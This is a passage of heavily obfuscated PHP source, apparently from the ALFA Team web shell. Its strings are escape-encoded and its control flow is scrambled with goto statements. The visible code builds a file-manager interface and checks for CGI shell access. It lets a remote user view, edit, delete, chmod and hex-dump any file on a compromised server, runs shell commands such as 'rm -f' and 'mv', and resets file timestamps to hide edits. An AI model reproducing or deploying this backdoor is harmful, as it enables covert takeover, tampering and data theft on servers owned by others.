146\x6e\141\155\145\165\160\x27\76\x3c\x2f\163\x70\x61\156\76\40\x3c\x73\x74\x72\157\x6e\x67\76\x26\156\142\163\160\73\x26\156\142\163\160\x3b\103\x68\157\x6f\163\145\40\141\40\146\151\154\145\74\57\163\164\x72\157\156\147\x3e\74\57\x6c\141\x62\145\154\76\x3c\x69\x6e\x70\165\x74\40\x69\x64\75\47\x66\157\x6f\164\x65\162\165\160\x27\x20\143\x6c\x61\163\x73\x3d\x27\164\x6f\157\x6c\163\111\x6e\x70\47\x20\x74\x79\160\x65\x3d\x27\146\151\x6c\x65\x27\x20\x6e\x61\155\x65\75\x27\146\133\135\47\x20\157\156\103\150\x61\156\147\x65\x3d\x27\150\141\x6e\144\x6c\x65\x75\160\50\x74\x68\151\163\x2c\x30\x29\x3b\x27\x3e\74\x2f\x70\x3e\x3c\151\x6e\x70\165\x74\40\164\x79\160\x65\x3d\x27\163\165\x62\x6d\x69\164\47\x20\156\141\x6d\x65\75\47\x73\165\x62\155\x69\164\x27\x20\166\141\154\165\145\75\x27\40\47\76\74\57\x66\157\162\x6d\76\x3c\x62\162\x3e\74\163\160\141\x6e\40\143\154\x61\163\x73\75\x27\143\x6f\x70\171\x72\151\x67\150\x74\47\76\x5b\x20\x2e\x2f\x41\x6c\x66\x61\124\145\x61\155\x20\46\143\157\160\x79\x3b\40\62\x30\61\62\x2d" . date("\x59") . "\40\135\74\57\163\x70\x61\156\76\74\x2f\164\144\76\xd\xa\74\57\x74\x72\76\xd\xa\x3c\57\x74\x61\142\154\x65\x3e\15\12\74\x2f\x64\151\166\x3e\15\xa\74\144\x69\x76\x20\151\x64\x3d\x27\143\147\x69\154\157\x61\144\145\x72\47\76\74\144\x69\x76\40\143\154\x61\x73\x73\x3d\x27\x65\x64\151\164\157\162\55\x77\162\141\160\160\x65\162\x27\76\74\144\151\166\40\x63\154\141\x73\x73\x3d\47\x65\x64\x69\164\157\x72\x2d\x68\x65\x61\x64\x65\x72\x27\76\x3c\144\x69\166\40\143\154\141\163\x73\75\x27\x65\144\151\x74\157\x72\x2d\x63\x6f\x6e\x74\162\x6f\x6c\x6c\x65\162\47\76\x3c\x64\x69\166\x20\x63\x6c\x61\163\x73\75\x27\145\144\x69\164\157\162\x2d\155\x69\156\x69\x6d\151\172\145\x27\40\157\156\103\154\x69\143\153\75\47\x65\144\x69\164\157\162\115\x69\x6e\151\155\x69\172\x65\x28\x22\x63\147\151\154\157\141\144\x65\x72\42\x29\73\47\76\x3c\57\144\x69\x76\x3e\74\144\x69\166\x20\157\156\103\154\151\x63\153\75\x27\145\x64\x69\164\x6f\x72\103\x6c\157\x73\x65\50\x22\143\x67\151\x6c\x6f\x61\x64\145\x72\x22\x29\x3b\x27\x20\143\154\x61\163\x73\75\x27\x63\x6c\x6f\x73\145\x2d\x62\x75\x74\x74\157\x6e\x27\x3e\x3c\x2f\x64\151\166\76\74\x2f\x64\151\166\x3e\x3c\x2f\x64\151\x76\x3e\x3c\144\x69\x76\x20\151\144\x3d\47\x63\x67\151\x66\x72\141\155\x65\x27\x20\163\x74\171\154\145\x3d\47\155\141\x72\x67\x69\x6e\55\154\145\x66\164\72\61\64\160\x78\x3b\x6d\x61\x72\147\151\156\x2d\x72\x69\147\x68\164\72\x33\60\x70\x78\73\x27\x3e\74\x2f\144\151\166\x3e\x3c\x2f\144\x69\x76\76\x3c\x2f\x64\151\166\x3e\xd\xa\x3c\x64\151\166\40\x69\x64\x3d\x27\x65\x64\x69\x74\157\162\47\76\x3c\144\151\x76\40\x63\154\141\163\163\75\x27\x65\x64\151\164\x6f\162\55\x77\x72\141\x70\160\145\x72\x27\76\74\144\x69\x76\x20\143\x6c\x61\163\163\75\47\x65\144\151\164\157\162\55\x68\x65\141\144\145\x72\47\76\74\x64\151\x76\40\143\154\141\163\163\75\47\145\x64\x69\164\x6f\x72\x2d\160\x61\x74\x68\47\76\74\57\x64\x69\166\x3e\x3c\144\151\166\x20\x63\154\141\163\163\75\x27\145\x64\151\164\x6f\x72\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x6c\x65\162\x27\76\x3c\144\151\166\x20\x63\x6c\x61\163\x73\75\x27\145\144\151\x74\157\162\x2d\155\x69\156\151\155\151\x7a\x65\x27\40\157\x6e\103\x6c\151\x63\153\x3d\47\x65\x64\151\x74\x6f\162\115\x69\x6e\151\155\151\172\145\x28\x22\145\x64\151\x74\x6f\x72\x22\51\73\47\x3e\74\57\x64\x69\166\x3e\74\x64\x69\x76\40\x6f\156\103\x6c\151\x63\x6b\x3d\x27\x65\x64\151\164\x6f\162\x43\x6c\x6f\x73\145\50\42\145\144\x69\x74\157\162\42\x29\73\47\40\143\x6c\141\163\163\75\47\x63\x6c\157\163\145\55\x62\165\164\164\157\156\47\x3e\74\57\144\x69\x76\76\x3c\x2f\144\x69\166\x3e\74\x2f\144\151\166\x3e\74\144\151\x76\x20\x63\154\x61\163\163\75\47\x65\x64\x69\x74\157\162\55\x65\170\160\154\157\162\145\162\47\x3e\x3c\x64\151\x76\40\143\x6c\x61\163\163\x3d\47\x68\x68\x65\141\144\145\162\x27\76\74\x64\151\x76\40\143\x6c\141\163\x73\x3d\47\x68\x69\163\164\157\x72\171\x2d\x63\154\145\x61\162\47\x20\157\156\143\154\x69\143\153\75\x27\143\154\x65\x61\162\105\144\151\164\x6f\162\110\151\x73\x74\x6f\x72\x79\50\x29\73\47\x3e\103\154\145\x61\162\40\141\154\x6c\x3c\57\x64\x69\166\x3e\74\144\151\x76\x20\143\x6c\141\163\163\75\47\150\150\x65\x61\144\145\162\x2d\164\145\170\164\47\x3e\110\x69\x73\164\157\x72\x79\74\57\144\x69\166\76\74\144\151\166\40\143\154\x61\x73\x73\x3d\47\145\x64\151\164\157\x72\x2d\163\145\141\x72\143\150\47\x3e\x3c\151\x6e\160\165\x74\x20\x74\171\160\145\x3d\x27\x74\145\170\x74\47\40\163\x74\x79\x6c\145\x3d\47\164\x65\x78\164\x2d\141\154\x69\147\156\x3a\x63\x65\x6e\164\x65\x72\x3b\x27\40\151\144\75\x27\x73\145\141\x72\x63\150\x2d\151\156\x70\x75\164\47\40\160\x6c\x61\143\x65\150\157\154\144\x65\x72\x3d\47\x73\x65\x61\162\143\x68\47\76\74\x2f\144\x69\166\x3e\74\57\144\x69\x76\76\74\x64\151\166\x20\143\154\x61\163\x73\x3d\x27\x68\151\x73\164\x6f\162\171\x2d\x6c\151\163\x74\x27\x3e\74\x2f\x64\151\166\x3e\74\57\x64\151\166\x3e\74\x64\x69\x76\x20\x63\x6c\x61\163\163\x3d\47\145\x64\151\164\157\x72\55\155\157\x64\141\154\47\x3e\74\x64\x69\x76\40\x63\x6c\141\163\163\x3d\47\x65\144\x69\164\157\162\55\142\157\x64\x79\47\x3e\74\144\151\166\40\143\x6c\x61\x73\x73\x3d\x27\145\144\x69\164\157\x72\55\x63\x6f\x6e\x74\x65\156\x74\x27\76\74\x2f\144\x69\x76\76\x3c\x2f\144\151\x76\76\74\x2f\144\x69\x76\x3e\x3c\57\x64\151\x76\76\x3c\x2f\144\151\166\x3e\xd\xa\x3c\144\151\x76\40\151\144\x3d\x27\165\160\144\141\x74\145\55\143\x6f\x6e\164\145\156\x74\x27\x3e\x3c\57\x64\x69\166\x3e\xd\12\x3c\144\151\166\40\x69\x64\75\x27\145\x64\x69\164\157\162\55\x6d\x69\x6e\x69\155\x69\x7a\x65\144\x27\x20\157\x6e\143\154\x69\143\x6b\75\x27\x73\150\x6f\167\105\144\151\164\x6f\x72\50\42\x65\x64\x69\164\157\162\x22\x29\x3b\x27\76\74\x64\x69\166\40\143\154\x61\x73\x73\x3d\47\155\x69\156\151\x6d\151\x7a\145\144\x2d\167\162\x61\160\160\145\x72\47\x3e\x3c\x64\x69\166\x20\x63\x6c\x61\x73\x73\x3d\x27\x6d\x69\156\151\155\x69\172\145\144\x2d\164\x65\170\164\x27\x3e\123\x68\157\x77\40\x45\144\151\164\x6f\162\x3c\x2f\x64\151\166\76\74\x2f\x64\151\x76\76\x3c\x2f\x64\x69\166\76\xd\12\74\x64\x69\166\x20\x69\144\x3d\x27\143\147\151\x6c\157\x61\144\x65\x72\55\x6d\151\156\x69\x6d\151\172\145\144\x27\40\157\156\x63\x6c\151\143\x6b\75\47\163\150\x6f\x77\x45\x64\151\164\157\162\x28\42\143\x67\151\154\157\141\x64\145\x72\x22\x29\73\x27\76\x3c\144\x69\x76\40\x63\x6c\x61\x73\163\x3d\47\155\151\156\x69\x6d\151\x7a\145\x64\x2d\167\162\141\x70\160\145\x72\x27\x3e\74\144\x69\166\x20\x63\154\x61\163\163\x3d\x27\x6d\151\x6e\151\x6d\151\x7a\x65\x64\x2d\164\x65\170\164\47\76\123\150\157\167\x20\x43\x67\x69\74\57\x64\151\x76\x3e\74\57\x64\x69\x76\76\x3c\57\144\x69\166\x3e\15\12\x3c\x73\x63\x72\x69\160\x74\76\xd\xa\x9\44\x28\x27\x73\x65\141\162\x63\150\55\x69\x6e\160\165\164\x27\51\56\x61\x64\x64\105\166\x65\x6e\x74\x4c\x69\163\164\x65\x6e\x65\162\x28\47\153\145\x79\144\x6f\167\156\x27\54\x20\146\x75\156\143\164\151\157\x6e\50\145\x29\173\15\xa\11\11\163\145\x74\124\x69\155\x65\157\x75\x74\50\146\x75\156\143\x74\151\x6f\x6e\50\51\173\15\12\x9\11\11\x76\141\162\40\x73\x74\x72\x69\x6e\x67\40\75\40\x24\x28\x27\x73\x65\x61\x72\x63\150\x2d\151\156\160\x75\164\x27\51\56\x76\x61\x6c\165\x65\xd\xa\11\x9\x9\x64\56\147\145\x74\105\154\145\x6d\145\x6e\164\x73\102\171\x43\x6c\x61\163\163\x4e\141\155\x65\x28\47\x68\151\x73\164\157\x72\x79\x2d\154\151\x73\x74\x27\51\133\x30\x5d\56\x69\x6e\x6e\x65\x72\110\x54\x4d\114\40\x3d\40\x27\47\73\15\xa\x9\11\x9\146\157\x72\50\x76\x61\x72\40\151\40\x69\x6e\x20\x65\144\151\164\157\x72\x5f\146\x69\x6c\x65\163\51\173\xd\xa\x9\x9\x9\x9\x69\146\x28\x65\144\151\x74\157\162\137\146\151\x6c\145\163\133\151\x5d\x2e\146\151\x6c\145\56\x73\x65\x61\162\x63\150\x28\x73\x74\x72\151\x6e\x67\51\40\41\75\x20\55\61\x20\174\174\x20\163\164\162\151\156\147\x20\x3d\x3d\x20\47\47\51\x7b\xd\12\11\x9\11\x9\11\166\x61\162\x20\155\157\x64\145\x20\75\40\x30\73\15\12\11\11\11\11\11\151\146\50\x69\x20\x3d\x3d\40\145\144\151\164\x6f\x72\x5f\143\x75\x72\162\145\156\164\x5f\146\151\x6c\145\51\x7b\xd\12\11\11\11\11\11\x9\155\157\144\145\40\x3d\40\47\x20\151\x73\x5f\141\143\x74\151\166\x65\47\73\xd\xa\11\x9\11\11\x9\175\15\12\11\x9\11\x9\x9\x69\x6e\x73\x65\162\164\124\157\110\x69\163\x74\157\162\171\x28\151\54\40\145\x64\151\x74\157\x72\137\x66\x69\x6c\x65\x73\133\151\x5d\56\146\x69\154\x65\54\x20\155\157\144\x65\54\x20\x65\x64\151\x74\157\x72\x5f\x66\x69\x6c\145\x73\133\x69\135\x2e\x74\x79\x70\x65\51\73\15\12\x9\11\11\11\x7d\15\12\x9\x9\11\x7d\15\12\11\x9\x7d\54\x20\61\60\60\51\x3b\xd\12\x9\175\x2c\x66\141\154\x73\145\x29\73\15\xa\11\137\x41\152\x61\170\50\144\x2e\x55\x52\114\54\40\47\141\75\x27\x2b\x61\x6c\146\x61\142\x36\64\x28\x27\143\x68\x65\x63\153\165\160\144\141\164\145\x27\x29\x2c\40\146\165\156\143\x74\151\157\x6e\50\x72\145\163\51\x7b\15\12\x9\x9\144\x2e\142\157\144\171\56\x69\x6e\163\145\162\164\x41\144\x6a\x61\143\145\156\x74\110\x54\x4d\114\x28\47\x62\x65\x66\x6f\x72\x65\145\x6e\144\47\x2c\40\x72\x65\x73\51\73\15\xa\11\175\x29\73\15\xa\11\151\146\50" . $GLOBALS["\156\145\145\144\137\x74\157\137\x75\x70\x64\x61\164\x65\x5f\150\x65\141\x64\145\x72"] . "\51\173\xd\xa\11\11\x5f\101\152\141\x78\50\144\56\125\122\x4c\x2c\x20\47\x61\75\x27\x2b\141\154\146\x61\142\x36\64\x28\x27\165\160\144\141\164\145\150\145\x61\144\x65\x72\x27\51\x2c\x20\146\x75\156\143\x74\x69\157\x6e\x28\162\145\x73\x29\x7b\xd\12\x9\x9\x9\164\x72\171\x7b\15\xa\11\11\x9\11\166\x61\x72\x20\x64\141\x74\141\x20\75\x20\112\x53\117\116\x2e\160\141\x72\163\x65\50\x72\x65\x73\51\x3b\15\12\11\11\x9\x9\x63\x6f\156\x73\x6f\154\x65\56\154\157\x67\50\144\141\164\x61\51\73\15\12\x9\11\x9\x9\x66\157\x72\x28\x76\x61\162\40\x69\x20\151\x6e\40\x64\141\164\x61\x29\173\xd\xa\x9\x9\11\11\x9\166\141\x72\40\150\x74\x6d\154\x20\75\40\x27\47\x3b\xd\xa\x9\11\11\11\x9\x66\x6f\x72\x28\x76\141\x72\x20\x62\40\75\40\x30\73\x20\142\x20\x3c\x20\144\141\x74\141\x5b\151\135\56\x6c\x65\156\147\164\x68\73\x20\x62\53\x2b\x29\173\xd\xa\x9\x9\11\11\11\x9\151\146\50\x69\x3d\75\x27\165\x73\145\x66\165\154\x27\174\x7c\151\x3d\75\47\x64\157\167\156\154\157\x61\x64\145\162\x27\51\173\15\12\11\x9\x9\x9\x9\11\x9\x68\x74\155\154\40\x2b\x3d\40\x27\74\x73\160\x61\x6e\40\143\x6c\141\x73\x73\75\x22\150\145\141\x64\x65\162\x5f\166\x61\154\x75\145\163\x22\x20\x73\164\171\x6c\145\75\x22\155\141\x72\147\151\x6e\x2d\154\145\146\164\x3a\40\x34\x70\x78\x3b\42\76\x27\x2b\144\x61\x74\x61\133\x69\x5d\x5b\142\135\x2b\x27\x3c\57\x73\160\141\156\x3e\x27\x3b\xd\12\11\11\11\11\11\11\175\145\x6c\x73\145\x7b\15\xa\11\11\11\x9\x9\x9\x9\x68\164\x6d\154\x20\53\x3d\x20\144\141\x74\141\133\x69\135\x5b\142\135\73\15\xa\11\11\11\11\x9\x9\x7d\15\12\x9\11\x9\11\x9\x7d\15\xa\x9\11\11\x9\x9\x76\141\162\40\145\x6c\x65\155\x20\x3d\40\x24\50\47\150\x65\x61\144\x65\x72\137\x27\x2b\151\x29\73\15\xa\x9\11\11\11\x9\151\146\x28\145\154\145\155\x29\x7b\145\x6c\145\x6d\56\151\x6e\156\145\x72\110\124\115\114\40\x3d\x20\150\164\155\154\73\175\xd\xa\11\x9\11\11\175\15\12\11\x9\x9\11\44\x28\47\150\x65\x61\144\145\162\x5f\x63\147\x69\x73\150\x65\154\x6c\x27\51\56\x69\x6e\156\x65\162\x48\x54\x4d\x4c\40\75\x20\47\117\116\x27\x3b\xd\12\11\11\x9\11\44\x28\47\x68\x65\141\x64\x65\x72\137\x63\147\151\x73\x68\145\154\154\47\51\56\163\145\x74\x41\164\164\162\151\x62\x75\x74\x65\x28\x27\x63\x6c\x61\163\x73\x27\54\40\47\150\x65\x61\x64\x65\162\x5f\x6f\156\47\x29\x3b\15\xa\x9\x9\11\175\x63\x61\164\143\x68\x28\x65\x29\173\x63\157\156\x73\x6f\154\145\x2e\x6c\157\147\x28\145\x29\175\15\xa\x9\x9\x7d\x29\x3b\15\12\11\x7d\x65\154\x73\x65\x20\x69\x66\x28\151\163\x6c\x69\156\165\x78\x29\x7b\15\12\11\x9\137\101\152\141\x78\50\144\56\125\x52\114\54\40\x27\x61\75\x27\x2b\x61\x6c\146\141\x62\66\x34\x28\x27\x63\150\145\143\x6b\x63\147\151\x27\51\54\40\x66\165\156\143\x74\x69\x6f\x6e\50\162\145\163\x29\x7b\xd\12\x9\11\11\x69\146\50\x72\x65\163\75\75\x27\157\x6b\x27\51\173\xd\12\11\x9\11\11\44\x28\47\x68\x65\141\x64\145\x72\137\143\147\151\163\x68\x65\154\x6c\x27\51\x2e\x69\156\156\x65\x72\x48\x54\x4d\114\40\75\40\47\117\x4e\x27\x3b\15\12\x9\x9\x9\11\44\x28\47\150\145\141\x64\145\162\x5f\143\147\151\x73\x68\145\x6c\x6c\47\x29\56\163\145\164\x41\x74\x74\162\151\142\x75\164\145\50\x27\x63\x6c\x61\163\x73\x27\x2c\x20\47\150\145\141\x64\145\x72\137\x6f\156\x27\51\73\15\12\x9\x9\11\175\15\xa\11\11\x7d\51\x3b\15\xa\11\x7d\15\xa\74\x2f\x73\143\162\x69\x70\164\76\15\xa\74\57\x62\x6f\x64\x79\76\15\12\x3c\x2f\150\164\x6d\x6c\x3e\xd\12"; } } goto oBMyV; iDAKi: function alfaFilesTools() { goto ClaEI; z81PZ: switch ($_POST["\141\154\146\x61\x32"]) { case "\x76\151\x65\x77": goto mc31J; WgF13: echo "\x3c\x2f\160\162\145\x3e\74\x2f\x64\151\166\x3e\74\x2f\x64\x69\166\x3e"; goto rcc61; rcc61: break; goto Cp0fB; mc31J: @chdir($_POST["\143"]); goto D40ig; rMaPt: echo htmlspecialchars(__read_file($_POST["\141\154\x66\141\61"])); goto WgF13; D40ig: echo "\74\x64\x69\166\40\x63\154\x61\x73\x73\x3d\42\x65\144\151\164\x6f\x72\x2d\x76\x69\145\x77\x22\76\x3c\144\x69\x76\40\x63\154\141\163\x73\75\42\x76\151\x65\x77\x2d\143\x6f\156\164\145\x6e\164\x22\x3e\74\160\x3e\x3c\x62\x75\x74\x74\157\x6e\x20\x73\164\171\x6c\145\x3d\42\142\x6f\x72\x64\145\162\55\162\141\x64\x69\165\x73\72\x31\60\x70\170\73\42\40\143\x6c\x61\163\x73\75\x22\142\165\x74\x74\157\156\x22\x20\x6f\156\x43\154\x69\x63\153\x3d\42\x63\x6f\x70\171\124\x6f\x43\154\x69\160\x62\157\141\x72\144\x28\47\166\151\145\167\137\155\154\137\x63\x6f\156\x74\145\x6e\x74\x27\x29\73\x22\76\143\x6f\x70\171\x20\x74\x6f\x20\143\x6c\x69\160\142\157\141\x72\x64\74\57\142\x75\164\164\x6f\156\x3e\74\x2f\160\76\x3c\160\x72\x65\x20\x63\154\x61\x73\163\75\x22\155\x6c\x31\42\40\x69\144\75\42\166\x69\x65\x77\x5f\155\x6c\137\143\x6f\156\164\x65\156\164\x22\76"; goto rMaPt; Cp0fB: case "\150\x69\147\x68\x6c\x69\x67\150\x74": goto zRfZU; fX2w0: break; goto ptTt8; MMQhc: if (@is_readable($_POST["\x61\x6c\x66\141\61"])) { goto L_gy2; i2_hD: echo str_replace(array("\74\x73\160\x61\156\40", "\74\x2f\163\x70\141\156\76"), array("\74\146\157\x6e\164\40", "\x3c\57\146\157\x6e\164\76"), $code) . "\x3c\57\x64\x69\x76\76\74\x2f\144\x69\x76\76\74\57\x64\151\166\x3e"; goto qKqVo; jL387: $code = @highlight_file($_POST["\x61\154\146\141\x31"], true); goto i2_hD; L_gy2: echo "\74\x64\151\166\x20\x63\154\x61\x73\163\x3d\42\145\144\x69\x74\x6f\162\x2d\166\x69\x65\x77\42\76\74\144\151\x76\x20\x63\154\141\163\x73\75\x22\166\151\x65\167\55\143\157\156\164\145\x6e\x74\x22\76\74\x64\151\x76\40\143\x6c\x61\163\x73\75\42\x6d\154\61\42\x20\x73\164\x79\x6c\145\75\42\x62\x61\143\153\x67\162\x6f\x75\156\144\x2d\x63\157\x6c\x6f\x72\x3a\x20\43\x65\61\145\61\x65\61\73\x63\x6f\154\157\x72\x3a\x62\154\141\x63\x6b\73\x22\x3e"; goto jL387; qKqVo: } goto fX2w0; zRfZU: @chdir($_POST["\x63"]); goto MMQhc; ptTt8: case "\x64\145\154\x65\x74\145": goto byClp; T3DtZ: break; goto M3DI_; RzunF: if (@is_writable($_POST["\x61\x6c\x66\x61\61"]) || isset($GLOBALS["\147\154\157\142\137\143\150\x64\x69\162\x5f\x66\x61\x6c\x73\145"])) { goto R22oO; R22oO: $deleted = true; goto TJSFS; TJSFS: if (!@unlink($_POST["\141\154\146\141\x31"])) { $deleted = false; if ($alfa_canruncmd) { if (_alfa_is_writable($_POST["\141\x6c\x66\141\61"])) { alfaEx("\162\x6d\40\55\146\x20\47" . addslashes($_POST["\141\154\146\x61\61"]) . "\47"); $deleted = true; } } } goto j4hi5; j4hi5: if ($deleted) { echo "\x46\x69\x6c\x65\x20\x44\145\154\x65\x74\145\144\56\x2e\x2e\x3c\x73\143\162\151\x70\164\76\x76\x61\162\40\x65\x6c\145\155\x20\75\40\44\x28\42" . $_POST["\141\x6c\146\x61\64"] . "\x22\x29\x2e\x70\x61\162\145\156\164\116\157\144\145\x3b\145\154\x65\155\56\x70\x61\162\145\156\164\116\157\144\145\x2e\162\x65\155\x6f\166\145\x43\150\151\154\144\x28\145\154\145\155\51\x3b\x64\x65\154\x65\164\x65\x20\145\144\x69\164\x6f\162\137\x66\x69\154\145\163\133\x22" . $_POST["\141\154\x66\x61\x34"] . "\42\135\x3b\74\57\163\143\162\151\x70\x74\x3e"; } else { echo "\x45\x72\x72\157\x72\56\x2e\56"; } goto TMIph; TMIph: } goto T3DtZ; byClp: @chdir($_POST["\143"]); goto RzunF; M3DI_: case "\143\x68\x6d\157\144": goto BCgRy; xKhuY: echo "\74\163\143\x72\x69\x70\164\76\x61\x6c\146\x61\x33\137\75\x22\42\x3b\74\x2f\x73\143\x72\151\160\164\76\x3c\146\157\162\155\40\157\156\x73\x75\x62\x6d\x69\x74\x3d\42\145\144\151\x74\x6f\x72\x28\x27" . addslashes($_POST["\x61\154\146\x61\x31"]) . "\47\54\x27" . $_POST["\x61\x6c\x66\x61\x32"] . "\x27\54\164\x68\151\163\x2e\143\150\x6d\x6f\144\56\166\141\x6c\165\x65\54\x27" . $_POST["\x63"] . "\47\54\47" . $_POST["\x61\154\146\x61\64"] . "\47\54\x27" . $ftype . "\47\51\73\x72\145\x74\x75\x72\x6e\x20\x66\141\x6c\x73\x65\73\x22\76\74\151\x6e\x70\x75\x74\40\x74\171\x70\145\75\x22\164\145\x78\x74\42\40\156\141\x6d\145\x3d\42\143\150\x6d\x6f\x64\x22\40\166\x61\x6c\x75\x65\75\x22" . $file_perm . "\x22\76\74\x69\156\160\x75\164\x20\164\171\x70\x65\x3d\x73\165\142\x6d\151\x74\40\x76\x61\x6c\x75\x65\x3d\42\x20\x22\x3e\x3c\x2f\146\157\x72\155\x3e"; goto RTiai; RTiai: break; goto aJrJk; ILPJX: if (!empty($_POST["\x61\x6c\x66\x61\63"])) { goto J0wt2; Yxlso: for ($i = strlen($_POST["\141\154\x66\141\63"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["\141\154\146\x61\x33"][$i] * pow(8, strlen($_POST["\141\x6c\146\x61\63"]) - $i - 1); } goto xNHVf; xNHVf: if (!@chmod($_POST["\141\154\146\x61\x31"], $perms)) { if ($chdir_fals && $alfa_canruncmd) { alfaEx("\x63\x64\40\47" . addslashes($_POST["\x63"]) . "\x27\x3b\143\150\155\x6f\x64\40" . addslashes($_POST["\141\154\146\141\63"]) . "\40\x27" . addslashes($alfa1_decoded) . "\47"); echo "\x53\x75\143\143\145\x73\x73\41"; } else { echo "\74\x66\x6f\x6e\x74\40\x63\157\154\157\162\75\42\x23\106\106\106\x46\x46\x46\42\76\x3c\x62\76\x43\141\156\x27\x74\x20\x73\145\x74\40\160\x65\x72\x6d\151\163\163\x69\x6f\x6e\163\41\74\x2f\x62\76\x3c\57\146\157\156\x74\x3e\74\142\x72\76\x3c\163\x63\x72\151\x70\x74\76\x64\157\143\165\x6d\x65\156\164\56\x6d\x66\x2e\141\154\x66\141\63\56\166\141\154\x75\x65\75\x22\x22\x3b\x3c\57\x73\x63\162\151\x70\x74\76"; } } else { echo "\x53\165\143\143\145\x73\163\x21"; } goto BvsWX; J0wt2: $perms = 0; goto Yxlso; BvsWX: } goto tqsge; BCgRy: @chdir($_POST["\x63"]); goto ILPJX; tqsge: clearstatcache(); goto mF4aj; jjKBL: if ($chdir_fals) { $file_perm = $file_info[5]; } else { $file_perm = substr(sprintf("\45\x6f", @fileperms($_POST["\x61\154\146\141\x31"])), -4); } goto xKhuY; mF4aj: AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1); goto jjKBL; aJrJk: case "\145\x64\151\x74": goto GOBDH; GOBDH: @chdir($_POST["\143"]); goto p_c_E; XXUiY: echo "\x3c\x62\165\x74\164\157\156\x20\143\x6c\x61\x73\x73\75\x22\x62\x75\164\164\x6f\x6e\x22\40\x73\164\171\x6c\x65\75\42\142\157\x72\144\x65\162\x2d\x72\x61\x64\151\x75\x73\72\61\x30\x70\170\73\42\x20\157\156\103\x6c\151\x63\x6b\x3d\42\143\x6f\160\x79\124\157\103\x6c\x69\x70\142\157\141\162\144\x28\x27\x65\144\x69\164\x5f\164\145\x78\x74\x61\x72\145\x61\x5f\143\x6f\156\x74\145\156\x74\47\x29\73\x22\x3e\x63\x6f\160\x79\x20\164\157\x20\143\154\151\160\x62\x6f\141\x72\144\x3c\x2f\142\x75\164\x74\x6f\156\x3e\x3c\x66\x6f\162\x6d\40\x69\x64\x3d\x22\145\144\x69\164\157\162\137\x65\144\x69\164\137\x61\162\x65\x61\42\40\157\156\163\165\x62\155\151\x74\x3d\x22\145\x64\151\164\157\162\50\47" . addslashes($alfa1_decoded) . "\47\x2c\x27" . $_POST["\x61\154\146\x61\62"] . "\x27\x2c\x27\x31\47\53\164\x68\x69\x73\56\x74\x65\170\164\x2e\166\x61\154\x75\145\54\47" . $_POST["\x63"] . "\47\x2c\x27" . $_POST["\141\x6c\146\141\x34"] . "\47\x2c\47" . $ftype . "\47\51\73\x72\145\164\165\162\156\x20\146\x61\x6c\163\x65\73\42\76\74\x70\76\x3c\151\x6e\x70\165\x74\x20\x74\171\160\145\75\x22\x73\x75\142\155\151\x74\x22\40\x76\x61\154\165\x65\75\42\x20\42\76\74\x2f\x70\76\x3c\164\145\170\x74\141\162\x65\x61\40\x6e\141\x6d\x65\x3d\42\x74\145\x78\164\42\x20\151\x64\x3d\42\145\x64\151\164\x5f\x74\x65\170\164\141\x72\145\141\137\143\x6f\156\164\145\156\x74\42\40\x63\x6c\141\x73\x73\x3d\42\x62\151\147\x61\162\145\141\42\40\x6f\156\x6b\145\x79\144\x6f\x77\156\75\42\x73\x61\x76\145\102\x79\113\145\x79\x28\x65\x76\x65\x6e\164\51\x3b\x22\x3e"; goto l0hTA; l0hTA: echo htmlspecialchars(__read_file($_POST["\x61\x6c\x66\x61\61"])); goto JUoPf; RtRTI: if (!empty($_POST["\141\x6c\146\x61\63"])) { goto Rubdo; Rubdo: $_POST["\x61\154\146\x61\63"] = substr($_POST["\141\154\x66\141\x33"], 1); goto URz9V; R1wrf: if ($chdir_fals && $alfa_canruncmd) { goto Mi0K3; l2YVw: if ($fp = @__write_file($filepath, $_POST["\141\x6c\x66\141\x33"])) { alfaEx("\x6d\166\x20\47" . addslashes($filepath) . "\x27\x20\x27" . addslashes($_POST["\141\x6c\x66\141\x31"]) . "\x27\73\162\x6d\x20\x2d\x66\40\47" . addslashes($filepath) . "\x27"); } goto QIYG8; YZZeU: $filepath = dirname($_SERVER["\123\103\122\x49\120\124\137\x46\111\x4c\105\x4e\x41\x4d\105"]) . "\57" . $randname; goto l2YVw; mS4Ik: $randname = $rname . rand(111, 9999); goto YZZeU; Mi0K3: $rname = $alfa1_decoded; goto mS4Ik; QIYG8: } goto GILPT; dsfcG: $fp = @__write_file($_POST["\x61\154\146\x61\61"], $_POST["\141\154\x66\141\63"]); goto R1wrf; GILPT: if ($fp) { echo "\123\141\166\145\144\41\74\x62\162\76\74\x73\x63\x72\151\x70\x74\76\x61\x6c\x66\141\x33\137\x3d\x22\42\x3b\x3c\57\163\x63\x72\151\x70\164\76"; @touch($_POST["\x61\154\146\x61\x31"], $time, $time); } goto uu10Z; URz9V: $time = @filemtime($_POST["\141\154\146\x61\x31"]); goto dsfcG; uu10Z: } goto XXUiY; JUoPf: echo "\x3c\x2f\164\145\170\164\x61\162\x65\141\76\x3c\160\76\x3c\151\x6e\x70\x75\164\40\164\x79\160\x65\75\x22\163\x75\142\x6d\151\x74\42\x20\x76\141\154\165\x65\x3d\x22\x20\x22\76\x3c\57\x70\76\x3c\57\146\157\x72\x6d\x3e"; goto H9KJ1; p_c_E: if (!@is_writable($_POST["\141\x6c\146\x61\x31"]) && !_alfa_is_writable($_POST["\x61\154\146\x61\x31"])) { echo "\x46\x69\154\145\40\151\x73\156\x27\x74\40\167\162\x69\x74\145\x61\142\154\145"; break; } goto RtRTI; H9KJ1: break; goto g8wH1; g8wH1: case "\x68\x65\170\144\165\155\160": goto J0pFd; uP7ws: $c = __read_file($_POST["\x61\154\x66\141\x31"]); goto hIcq9; uZkaR: break; goto LKaTC; hIcq9: $n = 0; goto BDrZ3; J0pFd: @chdir($_POST["\x63"]); goto uP7ws; ybzJE: $len = strlen($c); goto HL3ZU; qOLJP: echo 